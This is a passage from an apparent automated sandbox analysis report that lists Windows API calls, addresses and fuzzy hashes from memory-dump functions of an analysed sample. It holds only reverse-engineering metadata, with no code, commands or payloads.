                                                              • Instruction Fuzzy Hash: E341CA71A00104ABCB14FBA5ECC5FAEB7A9AF19314F15815FF81997292DB38AD04CB58
                                                              APIs
                                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0049B89E
                                                              • GetLastError.KERNEL32(?,00000000), ref: 0049B8C4
                                                              • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0049B8E9
                                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0049B915
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: CreateHardLink$DeleteErrorFileLast
                                                              • String ID:
                                                              • API String ID: 3321077145-0
                                                              • Opcode ID: b5ed0fe867dde7b75be1850398daa512076c130df3f72bce850afe8cc3e7c51e
                                                              • Instruction ID: 221d724c031c03bd9df16268ae837bc093be7c224e7b1a82cd5e5cfc044f642f
                                                              • Opcode Fuzzy Hash: b5ed0fe867dde7b75be1850398daa512076c130df3f72bce850afe8cc3e7c51e
                                                              • Instruction Fuzzy Hash: 4C411B39600610DFCB14EF15C585A5DBBE1EF89314F15809AEC4A9B362CB78FD05CB99
                                                              APIs
                                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 004B88DE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: InvalidateRect
                                                              • String ID:
                                                              • API String ID: 634782764-0
                                                              • Opcode ID: 8e3464546924ee10d4de309376f6756893be46e60e26d199cb7dd37cf6f57085
                                                              • Instruction ID: 3c4731f0cc8bbb40f4d3b531e89c5f3fdb129d65c86a0b66bbc03424fff69f5d
                                                              • Opcode Fuzzy Hash: 8e3464546924ee10d4de309376f6756893be46e60e26d199cb7dd37cf6f57085
                                                              • Instruction Fuzzy Hash: 0C31E574600108BFEF24AE28CC45BFA7BA8EB05350F54411BFA15D62A1CA78E950DB6F
                                                              APIs
                                                              • ClientToScreen.USER32(?,?), ref: 004BAB60
                                                              • GetWindowRect.USER32(?,?), ref: 004BABD6
                                                              • PtInRect.USER32(?,?,004BC014), ref: 004BABE6
                                                              • MessageBeep.USER32(00000000), ref: 004BAC57
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Rect$BeepClientMessageScreenWindow
                                                              • String ID:
                                                              • API String ID: 1352109105-0
                                                              • Opcode ID: 3158ee15c186e550a57d7e198dc34b00eadb648a4243249d93e62778fe4975f0
                                                              • Instruction ID: a2a9e88d65a5cf8f2c3dcb1218ff35892b1abe717ff715c2ffb395a5c54b948d
                                                              • Opcode Fuzzy Hash: 3158ee15c186e550a57d7e198dc34b00eadb648a4243249d93e62778fe4975f0
                                                              • Instruction Fuzzy Hash: 9F418E30600619DFCF11DF58D884AAA7BF5FB49344F1881BAE914DB361D734E861CBAA
                                                              APIs
                                                              • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00490B27
                                                              • SetKeyboardState.USER32(00000080,?,00000001), ref: 00490B43
                                                              • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00490BA9
                                                              • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00490BFB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: KeyboardState$InputMessagePostSend
                                                              • String ID:
                                                              • API String ID: 432972143-0
                                                              • Opcode ID: 2da292853287392b82afeb22cb6a615ed62cb2cbff78bbe1a1d699f79916b4ad
                                                              • Instruction ID: 29ce5f3adfb0ef6573d03536dc45297ad45a31b2bca6de983ad32eb2a16f65d2
                                                              • Opcode Fuzzy Hash: 2da292853287392b82afeb22cb6a615ed62cb2cbff78bbe1a1d699f79916b4ad
                                                              • Instruction Fuzzy Hash: 85312630D40218AEEF348AA98C05BFEBFA9AB45318F04437BE594522D1C37CA985975A
                                                              APIs
                                                              • GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 00490C66
                                                              • SetKeyboardState.USER32(00000080,?,00008000), ref: 00490C82
                                                              • PostMessageW.USER32(00000000,00000101,00000000), ref: 00490CE1
                                                              • SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 00490D33
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: KeyboardState$InputMessagePostSend
                                                              • String ID:
                                                              • API String ID: 432972143-0
                                                              • Opcode ID: fa9a944b897baf3728395cfeb06b3d10558360f81a4a84eb5dcb082b4717c931
                                                              • Instruction ID: ef330e49430cd798cab964a9a694be86a0b0ffe0a80aff15c68f8e1af64f1605
                                                              • Opcode Fuzzy Hash: fa9a944b897baf3728395cfeb06b3d10558360f81a4a84eb5dcb082b4717c931
                                                              • Instruction Fuzzy Hash: F6310530940218AEFF388A658C087FFBFA6AB45314F04473BE485522D1C33D9D49979A
                                                              APIs
                                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004661FB
                                                              • __isleadbyte_l.LIBCMT ref: 00466229
                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00466257
                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0046628D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                              • String ID:
                                                              • API String ID: 3058430110-0
                                                              • Opcode ID: 6971e780dd21f018cc849ab235de7e8f62da7bfe9b12c0f2d28748be19d9c0f8
                                                              • Instruction ID: fd082ba18617af2429c82f5f7e67c1110c0ab91f2fcc6f70e9821f1ca68b6feb
                                                              • Opcode Fuzzy Hash: 6971e780dd21f018cc849ab235de7e8f62da7bfe9b12c0f2d28748be19d9c0f8
                                                              • Instruction Fuzzy Hash: 1231F230600246AFDF219F65CC44BAB7FA9FF42310F16416AE82497291FB34E950CB96
                                                              APIs
                                                              • GetForegroundWindow.USER32 ref: 004B4F02
                                                                • Part of subcall function 00493641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0049365B
                                                                • Part of subcall function 00493641: GetCurrentThreadId.KERNEL32 ref: 00493662
                                                                • Part of subcall function 00493641: AttachThreadInput.USER32(00000000,?,00495005), ref: 00493669
                                                              • GetCaretPos.USER32(?), ref: 004B4F13
                                                              • ClientToScreen.USER32(00000000,?), ref: 004B4F4E
                                                              • GetForegroundWindow.USER32 ref: 004B4F54
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                              • String ID:
                                                              • API String ID: 2759813231-0
                                                              • Opcode ID: af133547668b53a49938c43808d20135dcce965d06ff6ace9cfbe79f35fc32df
                                                              • Instruction ID: b6627148cd030bbe35f4939c6b5f23225a86e137d84697d49c2c2db7a36dfb13
                                                              • Opcode Fuzzy Hash: af133547668b53a49938c43808d20135dcce965d06ff6ace9cfbe79f35fc32df
                                                              • Instruction Fuzzy Hash: 69312D71D00108AFCB14EFBAC8859EFF7F9EF99304F10446AE415E7201DA75AE058BA4
                                                              APIs
                                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 00493C7A
                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 00493C88
                                                              • Process32NextW.KERNEL32(00000000,?), ref: 00493CA8
                                                              • CloseHandle.KERNEL32(00000000), ref: 00493D52
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                              • String ID:
                                                              • API String ID: 420147892-0
                                                              • Opcode ID: 9cfc1f1386abc203da53634bdc5ea8907c9710f25ba758fa700921ccbf1c56e4
                                                              • Instruction ID: f335d3ff080c91af2b568f3d5377112cea61bd4ea3decdc4368de04a79fdabdb
                                                              • Opcode Fuzzy Hash: 9cfc1f1386abc203da53634bdc5ea8907c9710f25ba758fa700921ccbf1c56e4
                                                              • Instruction Fuzzy Hash: DC31F471108304DFD710EF55C891AAFBBE8EF89318F40093EF485822A1EB749E49CB56
                                                              APIs
                                                                • Part of subcall function 00432612: GetWindowLongW.USER32(?,000000EB), ref: 00432623
                                                              • GetCursorPos.USER32(?), ref: 004BC4D2
                                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0046B9AB,?,?,?,?,?), ref: 004BC4E7
                                                              • GetCursorPos.USER32(?), ref: 004BC534
                                                              • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0046B9AB,?,?,?), ref: 004BC56E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                              • String ID:
                                                              • API String ID: 2864067406-0
                                                              • Opcode ID: 5bf64ab07096634b44ba6adc9acb717850839a7747ed7e6b325c4f3e59331e37
                                                              • Instruction ID: bacc3030bf76d08f61a04910ad348a1d3e55127de64586fd5cbc4ec974674914
                                                              • Opcode Fuzzy Hash: 5bf64ab07096634b44ba6adc9acb717850839a7747ed7e6b325c4f3e59331e37
                                                              • Instruction Fuzzy Hash: B5318135510428FFCB259F58C8D8EFB7BB5EB09310F44416AF9098B361C735A960DBA8
                                                              APIs
                                                                • Part of subcall function 0048810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00488121
                                                                • Part of subcall function 0048810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0048812B
                                                                • Part of subcall function 0048810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0048813A
                                                                • Part of subcall function 0048810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00488141
                                                                • Part of subcall function 0048810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00488157
                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 004886A3
                                                              • _memcmp.LIBCMT ref: 004886C6
                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004886FC
                                                              • HeapFree.KERNEL32(00000000), ref: 00488703
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                              • String ID:
                                                              • API String ID: 1592001646-0
                                                              • Opcode ID: 01cc38c879496336a1003486fd99a942cc57ea7bdb10a28244448c834f403ccb
                                                              • Instruction ID: b44742dbf9dca8e60e990751f040fcbca84940cb96d594b5295ba7bb79a6d869
                                                              • Opcode Fuzzy Hash: 01cc38c879496336a1003486fd99a942cc57ea7bdb10a28244448c834f403ccb
                                                              • Instruction Fuzzy Hash: B0217C71E40108EFDB10EFA8CA49BEEB7B8EF45305F55445EE844A7241EB35AE05CB58
                                                              APIs
                                                              • __setmode.LIBCMT ref: 004509AE
                                                                • Part of subcall function 00435A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00497896,?,?,00000000), ref: 00435A2C
                                                                • Part of subcall function 00435A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00497896,?,?,00000000,?,?), ref: 00435A50
                                                              • _fprintf.LIBCMT ref: 004509E5
                                                              • OutputDebugStringW.KERNEL32(?), ref: 00485DBB
                                                                • Part of subcall function 00454AAA: _flsall.LIBCMT ref: 00454AC3
                                                              • __setmode.LIBCMT ref: 00450A1A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                              • String ID:
                                                              • API String ID: 521402451-0
                                                              • Opcode ID: 4f3b364da7a036f1364cb101cee8c711343dd61765e58c6661a92b3e6a9d8f24
                                                              • Instruction ID: 562e98a9a5bba183c54968324944e72ff5d1b2d75fade75d606a2ea874634575
                                                              • Opcode Fuzzy Hash: 4f3b364da7a036f1364cb101cee8c711343dd61765e58c6661a92b3e6a9d8f24
                                                              • Instruction Fuzzy Hash: 2B116D355041047FDB04B3BA9C469BE77A89F8531DF10015FF90457183EE2C4D9A979D
                                                              APIs
                                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 004A17A3
                                                                • Part of subcall function 004A182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 004A184C
                                                                • Part of subcall function 004A182D: InternetCloseHandle.WININET(00000000), ref: 004A18E9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Internet$CloseConnectHandleOpen
                                                              • String ID:
                                                              • API String ID: 1463438336-0
                                                              • Opcode ID: ff5704977cd6b8a98888ded24334e7bfcbf4ec2010ac4127ae4fcc3e8ae82f32
                                                              • Instruction ID: decc90da9851b16754c2cb2c9a1a134a68df5f673a37bd41cddd589d7fcd1d44
                                                              • Opcode Fuzzy Hash: ff5704977cd6b8a98888ded24334e7bfcbf4ec2010ac4127ae4fcc3e8ae82f32
                                                              • Instruction Fuzzy Hash: F221F635200601BFEB129F64CC40FBBBBA9FF5A710F10412FF91596660DB79D811A7A8
                                                              APIs
                                                              • GetFileAttributesW.KERNEL32(?,004BFAC0), ref: 00493A64
                                                              • GetLastError.KERNEL32 ref: 00493A73
                                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 00493A82
                                                              • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,004BFAC0), ref: 00493ADF
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: CreateDirectory$AttributesErrorFileLast
                                                              • String ID:
                                                              • API String ID: 2267087916-0
                                                              • Opcode ID: 18b4b4d0b656188786adcd842b53e764ba9b276a0815c1c1359f3b083923a971
                                                              • Instruction ID: d039559c0c3c6e171d4b91e80f0c9dc42bc9f3a94182d567af0919a391b3a76f
                                                              • Opcode Fuzzy Hash: 18b4b4d0b656188786adcd842b53e764ba9b276a0815c1c1359f3b083923a971
                                                              • Instruction Fuzzy Hash: A62194745082019F8B10DF28C88586B7BE4EE5A369F104A3FF4D9C72A1D7359E4ACB5A
                                                              APIs
                                                              • _free.LIBCMT ref: 00465101
                                                                • Part of subcall function 0045571C: __FF_MSGBANNER.LIBCMT ref: 00455733
                                                                • Part of subcall function 0045571C: __NMSG_WRITE.LIBCMT ref: 0045573A
                                                                • Part of subcall function 0045571C: RtlAllocateHeap.NTDLL(01210000,00000000,00000001,00000000,?,?,?,00450DD3,?), ref: 0045575F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: AllocateHeap_free
                                                              • String ID:
                                                              • API String ID: 614378929-0
                                                              • Opcode ID: f0c7514cf34b75d1dec3a5d65e69f8f71cac0de08a46e7e90ff919b5fdd99f2e
                                                              • Instruction ID: b2949bf79be9261998477489246c6bb8b46537fd038dcc6eb08de171396e66c4
                                                              • Opcode Fuzzy Hash: f0c7514cf34b75d1dec3a5d65e69f8f71cac0de08a46e7e90ff919b5fdd99f2e
                                                              • Instruction Fuzzy Hash: F711E7B1D00A11AFCB312F75EC057AE37985B063A6F10453FFD09A6252EE3C8D45869E
                                                              APIs
                                                              • _memset.LIBCMT ref: 004344CF
                                                                • Part of subcall function 0043407C: _memset.LIBCMT ref: 004340FC
                                                                • Part of subcall function 0043407C: _wcscpy.LIBCMT ref: 00434150
                                                                • Part of subcall function 0043407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00434160
                                                              • KillTimer.USER32(?,00000001,?,?), ref: 00434524
                                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00434533
                                                              • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0046D4B9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                              • String ID:
                                                              • API String ID: 1378193009-0
                                                              • Opcode ID: 0a64aea06e6ce9b391dbfeff2eabfc0a35df323df7c6c666c7276223eb3d24d3
                                                              • Instruction ID: 001abae7789dfa77c0979a5510598bd2e1201795355f12436f38be45fb6ef840
                                                              • Opcode Fuzzy Hash: 0a64aea06e6ce9b391dbfeff2eabfc0a35df323df7c6c666c7276223eb3d24d3
                                                              • Instruction Fuzzy Hash: 8321D370D04794AFE7328B248845BE7BBEC9B05309F04009FE78E56242D7782E88CB4A
                                                              APIs
                                                                • Part of subcall function 00435A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00497896,?,?,00000000), ref: 00435A2C
                                                                • Part of subcall function 00435A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00497896,?,?,00000000,?,?), ref: 00435A50
                                                              • gethostbyname.WSOCK32(?,?,?), ref: 004A6399
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 004A63A4
                                                              • _memmove.LIBCMT ref: 004A63D1
                                                              • inet_ntoa.WSOCK32(?), ref: 004A63DC
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
